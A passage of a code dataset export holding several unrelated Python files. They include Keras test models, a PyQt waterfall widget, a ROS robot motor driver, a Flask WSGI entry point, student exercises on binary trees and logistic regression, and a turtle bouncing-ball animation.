build_linear_regresion_keras_sequential_model(feature_dims=2):\n \"\"\"Build a linear regression `tf.keras.Model` using the Sequential API.\"\"\"\n keras_model = tf.keras.models.Sequential()\n keras_model.add(_dense_all_zeros_layer(feature_dims))\n return keras_model\n\n\ndef build_linear_regresion_keras_functional_model(feature_dims=2):\n \"\"\"Build a linear regression `tf.keras.Model` using the functional API.\"\"\"\n a = tf.keras.layers.Input(shape=(feature_dims,))\n b = _dense_all_zeros_layer()(a)\n return tf.keras.Model(inputs=a, outputs=b)\n\n\ndef build_linear_regresion_keras_subclass_model(feature_dims=2):\n \"\"\"Build a linear regression model by sub-classing `tf.keras.Model`.\"\"\"\n del feature_dims # unused.\n\n class _KerasLinearRegression(tf.keras.Model):\n\n def __init__(self):\n super(_KerasLinearRegression, self).__init__()\n self._weights = _dense_all_zeros_layer()\n\n def call(self, inputs, training=True):\n return self._weights(inputs)\n\n return _KerasLinearRegression()\n\n\ndef build_embedding_keras_model(vocab_size=10):\n \"\"\"Builds a test model with an embedding initialized to one-hot vectors.\"\"\"\n keras_model = tf.keras.models.Sequential()\n keras_model.add(tf.keras.layers.Embedding(input_dim=vocab_size, output_dim=5))\n keras_model.add(tf.keras.layers.Softmax())\n return keras_model\n\n\ndef build_conv_batch_norm_keras_model():\n \"\"\"Builds a test model with convolution and batch normalization.\"\"\"\n # This is an example of a model that has trainable and non-trainable\n # variables.\n l = tf.keras.layers\n data_format = 'channels_last'\n max_pool = l.MaxPooling2D((2, 2), (2, 2),\n padding='same',\n data_format=data_format)\n keras_model = tf.keras.models.Sequential([\n l.Reshape(target_shape=[28, 28, 1], input_shape=(28 * 28,)),\n l.Conv2D(\n 32,\n 5,\n padding='same',\n data_format=data_format,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n max_pool,\n l.BatchNormalization(),\n l.Conv2D(\n 64,\n 5,\n padding='same',\n data_format=data_format,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n max_pool,\n l.BatchNormalization(),\n l.Flatten(),\n l.Dense(\n 1024,\n activation=tf.nn.relu,\n kernel_initializer='zeros',\n bias_initializer='zeros'),\n l.Dropout(0.4),\n l.Dense(10, kernel_initializer='zeros', bias_initializer='zeros'),\n ])\n return keras_model\n","repo_name":"abogdanova/FedMed","sub_path":"federated-0.4.0/tensorflow_federated/python/learning/model_examples.py","file_name":"model_examples.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"24984293303","text":"from ..Spaces import (modify_servicer_pokt_space, servicer_param_update_space, servicer_unpause_space2,\n servicer_pause_space2, servicer_stake_status_space, servicer_relay_space,\n remove_servicer_space)\n\n\nmodify_servicer_pokt_holdings = {\"name\": \"Modify Servicer POKT Holdings\",\n \"description\": \"The mechanism to update the personal holdings of a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].servicer_address has its POKT Holdings modified by DOMAIN[0].value\",\n \"domain\": [modify_servicer_pokt_space],\n \"parameters_used\": []}\n\nmodify_servicer_stake = {\"name\": \"Modify Servicer Stake\",\n \"description\": \"The mechanism to update the stake of a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].servicer_address has its stake modified by DOMAIN[0].value\",\n \"domain\": [modify_servicer_pokt_space],\n \"parameters_used\": []}\n\nprune_servicer_qos = {\"name\": \"Prune Servicer QoS\",\n \"description\": \"The mechanism which prunes historical QoS (TestScores, ReportCard, etc…)\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].public_key has its QoS metrics pruned\",\n \"domain\": [servicer_param_update_space],\n \"parameters_used\": []}\n\nupdate_servicer_params = {\"name\": \"Update Servicer Params\",\n \"description\": \"The mechanism which updates servicer params\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].public_key has its params updated with the latest stake, assuming the stake was greater than the prior stake\",\n \"domain\": [servicer_param_update_space],\n \"parameters_used\": []}\n\nservicer_unpause_mechanism = {\"name\": \"Servicer Unpause Mechanism\",\n \"description\": \"The mechanism which unpauses a servicer\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its pause_height variable updated to None\",\n \"domain\": [servicer_unpause_space2],\n \"parameters_used\": []}\n\nservicer_update_pause_height = {\"name\": \"Servicer Update Pause Height\",\n \"description\": \"The mechanism which updates the pause height \",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its pause_height variable updated to DOMAIN[0].height\",\n \"domain\": [servicer_pause_space2],\n \"parameters_used\": []}\n\nupdate_servicer_stake_status = {\"name\": \"Update Servicer Stake Status\",\n \"description\": \"The mechanism which updates the staking status and as well the unstaking height.\",\n \"constraints\": [],\n \"logic\": \"The servicer at DOMAIN[0].address has its unstaking_height variable updated to DOMAIN[0].height which will be none if it is staking. It will also have its stake status set to DOMAIN[0].status.\",\n \"domain\": [servicer_stake_status_space],\n \"parameters_used\": []}\n\nremove_session = {\"name\": \"Remove Session\",\n \"description\": \"The mechanism which removes a session from the global state.\",\n \"constraints\": [],\n \"logic\": \"The session from DOMAIN[0] is removed from the global session state.\",\n \"domain\": [servicer_relay_space],\n \"parameters_used\": []}\n\nremove_servicer = {\"name\": \"Remove Servicer\",\n \"description\": \"The mechanism which removes a servicer from the global state.\",\n \"constraints\": [],\n \"logic\": \"The servicer from DOMAIN[0] is removed from the global session state.\",\n \"domain\": [remove_servicer_space],\n \"parameters_used\": []}\n","repo_name":"BlockScience/PocketMathSpec","sub_path":"src/Mechanisms/Servicer.py","file_name":"Servicer.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"31606322792","text":"import re\nimport sys\nimport os\nimport time\nimport struct\nimport signal\nimport numpy as np\nimport random\n\nfrom PyQt5 import Qt\nfrom PyQt5 import QtCore,QtGui\nfrom PyQt5.QtGui import QColor,QImage,QPainter\nfrom PyQt5.QtWidgets import QWidget\nfrom PyQt5.QtCore import QRect,QEvent\n\nclass WaterfallWidget(QWidget):\n def __init__(self,main,config,parent_widget):\n QWidget.__init__(self)\n self.main = main\n self.config = config\n self.parent_widget = parent_widget \n parent_widget.addWidget(self)\n self.installEventFilter(self)\n self.setMouseTracking(True)\n self.dw = 0\n self.dh = 0\n self.line = 0\n self.bias = self.main.config['waterfall_bias']\n self.drawing = False\n self.setup1()\n self.setup2()\n \n def eventFilter(self, object, evt):\n if evt.type() == QEvent.Wheel:\n self.bias += (-4,4)[evt.angleDelta().y() > 0]\n return False\n \n def setup1(self):\n self.colors = []\n for n in range(256):\n h = self.ntrp(n,0,256,240,60)\n cn = self.ntrp(n,0,256,80,255)\n self.colors.append(QColor.fromHsv(h,255.0,cn))\n \n def setup2(self):\n dw = self.dw\n dh = self.dh\n self.acquire_essential()\n if dw != self.dw or dh != self.dh:\n self.image = QImage(self.dw,self.dh,QImage.Format_RGB32)\n p = QPainter(self.image)\n p.fillRect(0, 0, self.width(), self.height(),QtGui.QColor(0,0,0))\n \n def acquire_essential(self):\n self.dh = self.height()\n self.dw = self.width()\n \n def ntrp(self,x,xa,xb,ya,yb):\n return (x-xa)*(yb-ya)/(xb-xa) + ya\n \n def accept_data_line(self,array):\n if not self.drawing and self.isVisible():\n self.line = (self.line - 1) % self.dh\n self.drawing = True\n qp = QPainter(self.image)\n \n la = len(array)\n ox = None\n for x,y in enumerate(array):\n x = self.ntrp(x,0,la,0,self.dw)\n y = int(self.ntrp(y*4+self.bias,self.config['dbscale_lo'],self.config['dbscale_hi'],0,255))\n y = (y,0)[y < 0]\n y = (y,255)[y > 255]\n if ox != None:\n qp.setPen(self.colors[y])\n qp.drawLine(ox,self.line,x,self.line)\n ox = x\n self.update()\n \n def paintEvent(self,event):\n if self.isVisible():\n self.drawing = True\n self.setup2()\n qp = QtGui.QPainter(self)\n ha = self.line\n hb = self.dh - ha\n \n fa = QRect(0,ha,self.dw,hb)\n fb = QRect(0,0,self.dw,ha)\n \n ta = QRect(0,0,self.dw,hb)\n tb = QRect(0,hb,self.dw,ha)\n \n qp.drawImage(ta,self.image,fa)\n qp.drawImage(tb,self.image,fb)\n self.drawing = False\n \n ","repo_name":"lutusp/PLSDR","sub_path":"Waterfall.py","file_name":"Waterfall.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":153,"dataset":"github-code","pt":"40"} +{"seq_id":"34427710373","text":"#!/usr/bin/env python\nimport sys\nimport os\n\n# Locate MOOSE directory\nos.chdir(os.path.abspath(os.path.dirname(__file__)))\nMOOSE_DIR = os.getenv('MOOSE_DIR', os.path.join(os.getcwd(), '..', 'moose'))\nif not os.path.exists(os.path.join(MOOSE_DIR, 'libmesh')):\n MOOSE_DIR = os.path.join(os.getcwd(), '..', '..', 'moose')\nif not os.path.exists(MOOSE_DIR):\n raise Exception('Failed to locate MOOSE, specify the MOOSE_DIR environment variable.')\nos.environ['MOOSE_DIR'] = MOOSE_DIR\n\n# Append MOOSE python directory\nMOOSE_PYTHON_DIR = os.path.join(MOOSE_DIR, 'python')\nif MOOSE_PYTHON_DIR not in sys.path:\n sys.path.append(MOOSE_PYTHON_DIR)\n\nos.environ['BLACKBEAR_DIR'] = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n\nfrom MooseDocs import main\nif __name__ == '__main__':\n sys.exit(main.run())\n","repo_name":"idaholab/blackbear","sub_path":"doc/moosedocs.py","file_name":"moosedocs.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"37471636365","text":"#!/usr/bin/env python\nimport numpy as np\nimport rospy\nfrom icub_drivers.msg import Commands, JointPositions\nfrom std_msgs.msg import Empty\nimport yarp\nimport sys\nimport data_keys\nimport time\n#import signal\n\nimport os\nos.environ[\"ROS_MASTER_URI\"] = \"http://localhost:11311\"\nos.environ[\"ROS_HOSTNAME\"] = \"localhost\"\n\n\nclass MotorDriver:\n\n\tdef __init__(self):\n\t\tself.robot_ip = \"localhost\" #\"192.168.26.135\"\n\n\t\t# Initialise YARP\n\t\tyarp.Network.init()\n\t\trospy.loginfo(\"motor_driver connected to yarp\")\n\n\t\t# create ros node\n\t\trospy.init_node('icub_motors_driver', anonymous=True)\n\n\t\t# create the subscribers\n\t\ttarget_pos_sub = rospy.Subscriber('/icubRos/commands/move_to_joint_pos', JointPositions, self.move_to_joint_pos_callback, queue_size=10)\n\n\t\tself.props = []\n\t\tself.joint_drivers = [] \n\t\t# encoders for each joint group,e.g. head, left_arm, etc.\n\t\tself.pos_control = []\n\t\t# number of joints in each joint group\n\t\tself.num_joint = [] \n\t\tfor j in range(len(data_keys.JointNames)):\t\n\t\t\tself.props.append(yarp.Property())\n\t\t\tself.props[-1].put(\"device\", \"remote_controlboard\")\n\t\t\tself.props[-1].put(\"local\", \"/client_motor/\"+data_keys.JointNames[j])\n\t\t\tself.props[-1].put(\"remote\", \"/icubSim/\"+data_keys.JointNames[j])\n\n\t\t\tself.joint_drivers.append(yarp.PolyDriver(self.props[-1]))\n\t\t\tself.pos_control.append(self.joint_drivers[-1].viewIPositionControl())\n\n\t\trospy.spin()\n\n\n\tdef get_num_joints(self, group_id):\n\t\treturn self.joint_drivers[group_id].viewIPositionControl().getAxes()\n\n\tdef move_to_joint_pos_callback(self, msg, verbose=True):\n\t\tself.cmd_msg = msg\n\n\t\tif verbose:\n\t\t\tstart_time = time.time()\n\n\t\tfor jn in range(len(data_keys.JointNames)):\n\t\t\tcmd = data_keys.get_joint_values_from_msg(self.cmd_msg, data_keys.JointNames[jn])\n\t\t\t\n\t\t\tif verbose:\n\t\t\t\tprint (\"sending cmd \", str(cmd))\n\t\t\tcmd_yarp = yarp.Vector(self.get_num_joints(jn))\n\t\t\tfor j in range(self.get_num_joints(jn)):\n\t\t\t\tcmd_yarp.set(j, cmd[j])\n\t\t\t# send command\n\t\t\tself.pos_control[jn].setControlMode(yarp.Vocab_encode('pos'))\n\t\t\tself.pos_control[jn].positionMove(cmd_yarp.data())\n\n\t\tif verbose:\n\t\t\tend_time = time.time()\n\t\t\telapsed = end_time - start_time\n\t\t\tprint (\"sending command took (seconds): \", elapsed)\n\n\n\nif __name__==\"__main__\":\n\trospy.loginfo(\"motor_driver started\")\n\ttry:\n\t\tmotorDriver = MotorDriver()\n\t\t\n\texcept rospy.ROSInterruptException:\n\t\tpass\n\n","repo_name":"guidoschillaci/icub_sensory_enhancement_","sub_path":"ros_ws/src/icub_drivers/src/icub_motors_driver.py","file_name":"icub_motors_driver.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6826981446","text":"\"\"\"Web Server Gateway Interface entry-point.\"\"\"\n\nimport os\nfrom typing import Optional\n\nfrom flask import Flask\n\nfrom preview.factory import create_app\n\n__flask_app__: Optional[Flask] = None\n\n\ndef application(environ, start_response):\n \"\"\"WSGI application factory.\"\"\"\n global __flask_app__\n for key, value in environ.items():\n if type(value) is str and key != 'SERVER_NAME':\n os.environ[key] = value\n if __flask_app__ is not None and key in __flask_app__.config:\n __flask_app__.config[key] = value\n if __flask_app__ is None:\n __flask_app__ = create_app()\n return __flask_app__(environ, start_response)\n","repo_name":"arXiv/arxiv-submission-preview","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4534133046","text":"\n####################\n# Helper functions #\n# - print_tree #\n# - accumulate #\n####################\n\ndef print_tree(tree, print_output=True):\n \"\"\"\n Helper function to print trees in this mission.\n\n Yes, it looks scary. Nothing to see here (:\n \"\"\"\n def get_elements_at_level(tree, level):\n def helper(tree, level, cur):\n if is_empty_tree(tree) and cur < level:\n dummy = build_tree(\" \", make_empty_tree(), make_empty_tree())\n return helper(left_branch(dummy), level, cur + 1) + helper(right_branch(dummy), level, cur + 1)\n if cur == level:\n if is_empty_tree(tree):\n return (\" \", )\n else:\n return (entry(tree), )\n elif cur < level:\n return helper(left_branch(tree), level, cur + 1) + helper(right_branch(tree), level, cur + 1)\n return helper(tree, level, 0)\n\n def height(tree):\n if is_empty_tree(tree):\n return 0\n else:\n return 1 + max(height(left_branch(tree)), height(right_branch(tree)))\n\n h = height(tree)\n output_string = \"\"\n\n for level in range(h):\n indent = 2 ** (h - (level + 1)) - 1\n spacing = 2 ** (h - level) - 1\n\n output = \" \" * indent\n\n for i, e in enumerate(get_elements_at_level(tree, level)):\n if level == 0 or i == 0:\n output = output + str(e)\n else:\n output = output + \" \" * spacing + str(e)\n if print_output:\n print(output)\n else:\n output_string += output + '/'\n if not print_output:\n return output_string\n\ndef accumulate(fn, initial, seq):\n if not seq: # if seq is empty\n return initial\n else:\n return fn(seq[0], accumulate(fn, initial, seq[1:]))\n\n\n###########\n# # 1a #\n###########\n\ndef build_tree(entry, left, right):\n \n return [entry, left, right]\n\n\n###########\n# # 1b #\n###########\n\ndef entry(tree):\n #\n return tree[0]\n\ndef left_branch(tree):\n #\n return tree[1]\n\ndef right_branch(tree):\n #\n return tree[2]\n\n\n###########\n# # 1c #\n###########\n\ndef make_empty_tree():\n #\n return []\n\n\n###########\n# # 1d #\n###########\n\ndef is_empty_tree(tree):\n #\n return True if tree==None or len(tree)==0 else False\n\nt1 = build_tree(2, build_tree(1, make_empty_tree(),\n make_empty_tree()),\n build_tree(3, make_empty_tree(),\n make_empty_tree()))\nprint_tree(t1)\n#=> 2\n#=>1 3\n\nt2 = build_tree(5, build_tree(2, build_tree(1, make_empty_tree(),\n make_empty_tree()),\n make_empty_tree()),\n build_tree(7, make_empty_tree(),\n build_tree(10, make_empty_tree(),\n make_empty_tree())))\nprint_tree(t2)\n#=> 5\n#=> 2 7\n#=>1 10\n\n\n###########\n# # 2a #\n###########\n\ndef insert_tree(x, tree):\n \"\"\"\n - tree is empty -> return a tree with x as entry and empty left and right branches\n - x <= entry -> return new tree with x inserted into left sub tree\n - otherwise -> return new tree with x inserted into right sub tree\n \"\"\"\n if is_empty_tree(tree):\n return build_tree(x, make_empty_tree(),make_empty_tree())\n elif x>entry(tree):\n return build_tree(entry(tree), left_branch(tree),insert_tree(x,right_branch(tree)))\n else:\n return build_tree(entry(tree), insert_tree(x,left_branch(tree)), right_branch(tree),)\n \n\nt1 = insert_tree(5, t1)\nprint_tree(t1)\n#=> 2 insert_tree(5, t1) 2\n#=>1 3 ===> 1 3\n#=> 5\n\nt2 = insert_tree(6, t2)\nprint_tree(t2)\n#=> 5 insert_tree(6, t2) 5\n#=> 2 7 ===> 2 7\n#=>1 10 1 6 10\n\nt2 = insert_tree(3, t2)\nprint_tree(t2)\n#=> 5 insert_tree(3, t2) 5\n#=> 2 7 ===> 2 7\n#=>1 6 10 1 3 6 10\n\n\n###########\n# # 2b #\n###########\n\n# Time complexity of insert_tree: O(logn)\n\n\n###########\n# # 2c #\n###########\n\ndef contains(x, tree):\n \"\"\" Returns true if x is in binary tree, otherwise return false \"\"\"\n #\n if is_empty_tree(tree):\n return False\n elif entry(tree)==x:\n return True\n elif x True\n\nprint(contains(5, t1))\n#=> True\n\nprint(contains(42, t1))\n#=> False\n\nprint(contains(10, t2))\n#=> True\n\nprint(contains(6, t2))\n#=> True\n\nprint(contains(11, t2))\n#=> False\n\n\n###########\n# # 2d #\n###########\n\n# Time complexity of contains O(logn):\n\n\n###########\n# # 2e #\n###########\nprint(t1)\ndef flatten(tree):\n \"\"\" flattens tree with the following rule:\n visit left branch, visit entry then visit right branch \"\"\"\n if is_empty_tree(tree):\n return []\n else:\n return flatten(left_branch(tree))+[entry(tree),]+flatten(right_branch(tree))\n\nprint(flatten(t1),'here')\n#=> [1, 2, 3, 5]\n\nprint(flatten(t2))\n#=> [1, 2, 3, 5, 6, 7, 10]\n\n\n###########\n# # 2f #\n###########\n\n# Time complexity of flatten O(n^2):\n\n\n###########\n# # 3a #\n###########\n\ndef sort_it(lst):\n Btree=accumulate(insert_tree, [], lst)\n return flatten(Btree)\n\nprint(sort_it([5, 3, 2, 1, 4, 6, 7, 9]))\n#=> [1, 2, 3, 4, 5, 6, 7, 9]\n\nprint(sort_it([5, 3, 2, 1, 4, -1, 6, 0, 7, 9]))\n#=> [-1, 0, 1, 2, 3, 4, 5, 6, 7, 9]\n\n\n###########\n# # 3b #\n###########\n\n# Time complexity of sort_it O(+n^2*logn):\n","repo_name":"jasonjiang8866/algorithm_design","sub_path":"binary treee inserting searching and sorting .py","file_name":"binary treee inserting searching and sorting .py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32205323922","text":"## Name: Ian Johnson\n## Date Last Modified: 9.16.16\n## Program: Turtle Animation\n## Purpose: Simple animation of a ball falling and bouncing\n## Honesty Statement: I neither gave nor recieved unauthorized help on this code.\n##\n## END GOAL: Animate the Pixar ball falling, then bouncing across the screen.\n\nfrom turtle import *\n\n# Define colors\npurple = (1,0,1)\nred = (1,0,0)\ngreen = (0,1,0)\nblue = (0,0,1)\nyellow = (1,1,0)\nazure = (0,1,1)\nblack = (0,0,0)\nwhite = (1,1,1)\n\n# Define a few variables for future reference\nradius = 25 ## Radius of ball\nx = -275 ## Inital 'x' position\ny = 100 ## Inital 'y' position\nroll = 0\narc = 0\n\ntracer(0) ## Draw instantly\nhideturtle() ## Do not show the pen\n\ndef ballArc(h, k, a): ## (h, k) specifies vertex; 'a' is shape of parabola\n global x, y, roll, arc\n while(True):\n if y >= -280: ## Animation of ball\n clear() ## Clear previous drawings (after first iteration)\n \n # Draw 'floor'\n penup()\n pensize(3)\n setposition(-400,-275)\n setheading(0)\n pencolor(black)\n pendown()\n forward(750)\n \n # Draw circle\n penup()\n fillcolor(yellow)\n pencolor(blue)\n pensize(4)\n setposition(x,y) ## Set new Turtle position\n pendown()\n begin_fill() ## Define shape that will be filled\n circle(radius) ## Draw a circle with the user-defined radius\n end_fill() ## End defining shapes that will be filled\n \n # Draw a star\n penup() ## Allows pen to be positioned\n setposition(x, y + 6) ## Set start postion to center star\n circle(radius - radius/4, -arc) # Draw an arc\n pendown() ## Prepare pen for drawing \n setheading(heading()+112) ## Set direction of turtle\n fillcolor(red) ## Set fill color\n begin_fill() ## Begin defining shape to fill with color\n for i in range(0,5): ## Draws star\n pensize(1)\n pencolor(red)\n forward(12) \n left(72) \n forward(12) \n right(144)\n end_fill() ## End defining shape to fill\n \n update() ## Update drawings\n \n prevX = x\n prevY = y\n x += .25 ## Change x and y values so next rendering is moved\n y = a * (x-h)**2 + k ## Creates a parabolic shape for the ball\n roll -= 1\n arc += 2\n \n else:\n currentX = x\n currentY = y\n #print('Current Y:',y)\n x = prevX\n y = prevY\n break\n \n# All the magic happens here\nballArc(-275,100,-.5) ## First bounce\nprint('1')\nballArc(-225,50,-.5) ## Second bounce\nprint('2')\nballArc(-175, 25, -.5) ## Third bounce\nprint('3')\nballArc(-130, 25, -.5) ## Fourth bounce\nprint('4')\nballArc(-80, 0, -.25) ## Fifth bounce\nprint('5')\nballArc(-20, -25, -.25) ## Sixth bounce\nprint('6')\nballArc(30, -50, -.25) ## Seventh bounce\nprint('7')\nballArc(80, -75, -.25) ## Eighth bounce\nprint('8')\nballArc(120, -100, -.25) ## Ninth bounce\nprint('9')\nballArc(150, -125, -.25) ## Tenth bounce\nprint('10')\nballArc(170, -150, -.25) ## Eleventh bounce\nprint('11')\nballArc(180, -175, -.25) ## Twelfth bounce\nprint('12')\nballArc(125, -200, -.25) ## Thirteenth bounce\nprint('13')\nballArc(150, -225, -.25) ## Fourteenth bounce\nprint('14')\nballArc(175, -250, -.25) ## Fifteenth bounce\nprint('15')\n\n# Make the ball roll off screen\nwhile(x <= 350): ## While ball is on screen\n clear() ## Clear previous drawings (after first iteration)\n \n # Draw 'floor'\n penup()\n pensize(3)\n setposition(-400,-275)\n setheading(0)\n pencolor(black)\n pendown()\n forward(750)\n \n # Draw circle\n penup()\n fillcolor(yellow)\n pencolor(blue)\n pensize(4)\n setposition(x,y) ## Set new Turtle position\n pendown()\n begin_fill() ## Define shape that will be filled\n circle(radius) ## Draw a circle with the user-defined radius\n end_fill() ## End defining shapes that will be filled\n \n # Draw a star\n penup() ## Allows pen to be positioned\n setposition(x, y + 6) ## Set start postion to center star\n circle(radius - radius/4, -arc) ## Draw an arc\n pendown() ## Prepare pen for drawing \n setheading(heading()+112) ## Set direction of turtle\n fillcolor(red) ## Set fill color\n begin_fill() ## Begin defining shape to fill with color\n for i in range(0,5): ## Draws star\n pensize(1)\n pencolor(red)\n forward(12) \n left(72) \n forward(12) \n right(144)\n end_fill() ## End defining shape to fill\n \n update() ## Update drawings\n \n x += 1 ## Change x and y values so next rendering is moved\n arc += 2 ## Change arc length\n\ndone()","repo_name":"unspezifische/CPTR-124-Turtle-Graphics","sub_path":"animation2.py","file_name":"animation2.py","file_ext":"py","file_size_in_byte":5672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20050989168","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport scipy.optimize as opt\n\n# 展示前五行数据\npath = \"ex2data1.txt\"\ndata = pd.read_csv(path, header=None, names=['exam1', 'exam2', 'admitted'])\n# print(data.head())\n\n# # 绘制原始数据\npositive = data[data['admitted'].isin([1])] # 筛选admitted列中是1的数据出来\nnegative = data[data['admitted'].isin([0])]\n\n# fig, ax = plt.subplots(figsize=(8, 5)) # 设置出来的画布大小为8*5\n# # 绘制散点图。x轴为exam1,y轴为label2,颜色是绿色,标记是o(圆形),绘制的标签是admitted\n# ax.scatter(positive[\"exam1\"], positive[\"exam2\"],\n# c='green', marker='o', label=\"admitted\")\n# # 绘制散点图。x轴为exam1,y轴为label2,颜色是红色,标记是x(x形),绘制的标签是not admitted\n# ax.scatter(negative[\"exam1\"], negative[\"exam2\"],\n# c='red', marker='x', label=\"not admitted\")\n# ax.legend() # 绘制标签将其显示出来\n# # plt.show()\n\n# 实现\n\n# S型函数(Sigmoid)\n\n\ndef S(z):\n return 1/(1+np.exp(-z))\n\n# 代价函数\n\n\ndef cost(theta, x, y):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(S(x*theta.T)))\n second = np.multiply((1-y), np.log(1-S(x*theta.T)))\n return np.sum(first-second)/len(x)\n\n\n# 初始化操作\ndata.insert(0, \"Ones\", 1) # 在data中的第0列插入表头为ONEs数据为1的一列数据\ncols = data.shape[1] # 返回data矩阵的形式,0代表行,1代表列\nx = data.iloc[:, 0:cols-1] # 基于位置的索引\ny = data.iloc[:, cols-1:cols]\ntheta = np.zeros(3)\n\n# x.values文档中推荐使用x.to_numpy()代替同样可以返回numpy.ndarray数据\nx = np.array(x.to_numpy())\ny = np.array(y.to_numpy())\n\n# 梯度下降\n\n\ndef gradient(theta, x, y):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1]) # ravel()是将其矩阵化为1维矩阵\n grad = np.zeros(parameters)\n\n error = S(x*theta.T)-y\n for i in range(parameters):\n term = np.multiply(error, x[:, i])\n grad[i] = np.sum(term)/len(x)\n\n return grad\n\n\n# 使用工具库计算θ的值\n\n# result = opt.fmin_tnc(func=cost, x0=theta, fprime=gradient, args=(x, y))\n# 截断牛顿法的传参列表:\n# func:优化的目标函数\n# x0:初值\n# fprime:提供优化函数func的梯度函数,不然优化函数func必须返回函数值和梯度,或者设置approx_grad=True\n# approx_grad :如果设置为True,会给出近似梯度\n# args:元组,是传递给优化函数的参数\n\n# 返回值是第一个为数组,返回的优化问题目标值相当于返回θ。第二个整数,优化函数运行次数\n\n# 画出决策曲线\n# plotting_x1 = np.linspace(30, 100, 100) # 30-100中平均划分100个数字\n# plotting_h1 = (-result[0][0]-result[0][1]*plotting_x1)/result[0][2]\n\n# fig, ax = plt.subplots(figsize=(8, 5))\n# ax.plot(plotting_x1, plotting_h1, color='black', label='prediction')\n# ax.scatter(positive[\"exam1\"], positive[\"exam2\"],\n# c='green', marker='o', label=\"admitted\")\n# ax.scatter(negative[\"exam1\"], negative[\"exam2\"],\n# c='red', marker='x', label=\"not admitted\")\n# ax.legend()\n# ax.set_xlabel(\"exam1 score\")\n# ax.set_ylabel(\"exam2 score\")\n# plt.show()\n\n# 评价逻辑回归模型\n# 手动模拟一个数据\n\n\ndef hfunc(theta, x):\n return S(theta.T@x) # 疑问:输入[1,0,0]得到的录取率180%多是否做边界检查?\n\n\ndef predict(theta, x):\n predictions = []\n probability = S(x@theta.T)\n for x in probability:\n if x >= 0.5:\n predictions.append(1)\n else:\n predictions.append(0)\n return predictions\n\n\n# 使用训练集评测模型的准确率\n# theta_min = np.matrix(result[0])\n# predictions = predict(theta_min, x)\n# corrent = []\n# print(type(predictions), type(y))\n# for (a, b) in zip(predictions, y):\n# if (a == 1 and b == 1) or (a == 0 and b == 0):\n# corrent.append(1)\n# else:\n# corrent.append(0)\n# accuracy = (sum(corrent))/len(corrent)\n# print(\"accuracy is {0}%\".format(accuracy*100))\n\n# 正则化逻辑回归\n\n# 数据可视化\npath = \"ex2data2.txt\"\ndata2_init = pd.read_csv(path, header=None, names=[\n \"test1\", \"test2\", \"accepted\"])\npositive2 = data2_init[data2_init[\"accepted\"].isin([1])]\nnegative2 = data2_init[data2_init[\"accepted\"].isin([0])]\n# fig, ax = plt.subplots(figsize=(8, 5))\n# ax.scatter(positive2[\"test1\"], positive2[\"test2\"],\n# c=\"b\", marker=\"o\", label=\"accepted\")\n# ax.scatter(negative2[\"test1\"], negative2[\"test2\"],\n# c=\"r\", marker=\"x\", label=\"rejected\")\n# ax.legend()\n# ax.set_xlabel(\"test1 score\")\n# ax.set_ylabel(\"test2 score\")\n# plt.show()\n\n# 特征映射\ndegree = 6\ndata2 = data2_init\nx1 = data2[\"test1\"]\nx2 = data2[\"test2\"]\n\ndata2.insert(3, \"ones\", 1)\n\nfor i in range(1, degree+1):\n for j in range(0, i+1):\n data2[\"f\"+str(i-j)+str(j)] = np.power(x1, i-j)*np.power(x2, j)\n\n# 删除test1这一列,axis=1代表删除的是列,inplace就地删除并且不放回所要删除的东西\ndata2.drop(\"test1\", axis=1, inplace=True)\ndata2.drop(\"test2\", axis=1, inplace=True)\n# print(data2.head())\n\n# 代价函数和梯度\n\n# 正则化代价函数\n\n\ndef costREG(theta, x, y, learningRate):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n first = np.multiply(-y, np.log(S(x*theta.T)))\n second = np.multiply((1-y), np.log(1-S(x*theta.T)))\n reg = (learningRate/(2*len(x))) * \\\n np.sum(np.power(theta[:, 1:theta.shape[1]], 2))\n return np.sum(first-second)/len(x)+reg\n\n\n# 正则化梯度函数\ndef gradientREG(theta, x, y, learningRate):\n theta = np.matrix(theta)\n x = np.matrix(x)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = S(x*theta.T)-y\n\n for i in range(parameters):\n term = np.multiply(error, x[:, i])\n\n if i == 0:\n grad[i] = np.sum(term)/len(x)\n else:\n grad[i] = (np.sum(term)/len(x))+((learningRate/len(x))*theta[:, i])\n return grad\n\n\n# 初始化x,y,theta\ncols = data2.shape[1]\nx2 = data2.iloc[:, 1:cols]\ny2 = data2.iloc[:, 0:1]\ntheta2 = np.zeros(cols-1)\nx2 = np.array(x2.to_numpy())\ny2 = 